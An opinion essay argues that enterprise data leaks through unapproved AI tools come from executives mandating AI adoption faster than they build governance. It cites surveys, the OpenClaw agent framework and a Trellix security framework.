A developer pastes an API key into ChatGPT to debug a function. A sales manager uploads a client contract to an AI summarizer she found on Product Hunt. Neither of them thinks they did anything wrong. Neither of them filed an incident report. And yet, in both cases, proprietary data left the building through a channel the security team cannot see, cannot audit, and cannot reverse.

This is what a data leak looks like in 2026: not a breach, not an intrusion, not a ransom note. Just an employee using a tool that works.

The Policy Gap That Productivity Built

A WRITER survey published April 7 found that 67% of executives believe their company has already suffered a data leak from an unapproved AI tool. Fifty-five percent describe their organization's AI use as a "chaotic free-for-all." These are not small companies with immature IT departments. These are enterprises that deployed AI in at least one function last year, which describes 88% of businesses according to a 2025 count, and watched their security controls fail to keep pace with the adoption curve.

The mechanism is almost insultingly simple. Generative AI tools accept input over HTTPS, the same protocol your firewall treats as legitimate traffic. There is no packet inspection that distinguishes "employee browsing the web" from "employee uploading a customer database to a third-party model." The data exits cleanly, without triggering a single alert, and lands in a training pipeline or a conversation log governed entirely by someone else's terms of service.

OpenClaw, an open-source AI agent framework, crossed 135,000 GitHub stars by March 2026. It can be configured to access Slack, Google Workspace, and internal SaaS tools with persistent memory across sessions. An employee can install it in an afternoon. The IT department may never know it exists until the agent has already read six months of internal communications.

Who Gets Pressured to Adopt and Who Gets Blamed for the Leak

Here is the structural problem that the vendor frameworks do not address: 60% of companies plan layoffs for employees who resist AI adoption. The pressure to use these tools is explicit and career-consequential. The policy prohibiting unapproved tools is, at most, a paragraph in an acceptable-use document nobody reads. When those two forces collide, employees reach for whatever works. The leak is not a failure of individual judgment. It is the predictable output of an incentive structure that rewards adoption and ignores risk.

Trellix's three-part framework, announced April 8, combining policy, visibility, and enforcement, is a reasonable response to a real problem. I will grant that governance frameworks are more useful than blanket bans, which simply drive shadow AI further underground. But Trellix sells security software, and a framework that requires their product to function is not a neutral public health recommendation. The companies buying DLP dashboards are not the ones creating the pressure to adopt without guardrails. Those are the same executives who told the WRITER survey they have no confidence in stopping a rogue AI agent, while simultaneously threatening to fire the employees most likely to slow down and ask questions.

Average breach costs rose $670,000 in 2025 when AI was involved. That number will appear in a board presentation somewhere as a reason to buy security tooling. It should also appear as a reason to stop threatening employees for being cautious.

The exposure is not a technical problem with a technical solution. It is a governance problem created by executives who mandated AI adoption faster than they built the policies to contain it. The developer who pasted that API key into ChatGPT was just trying to keep her job.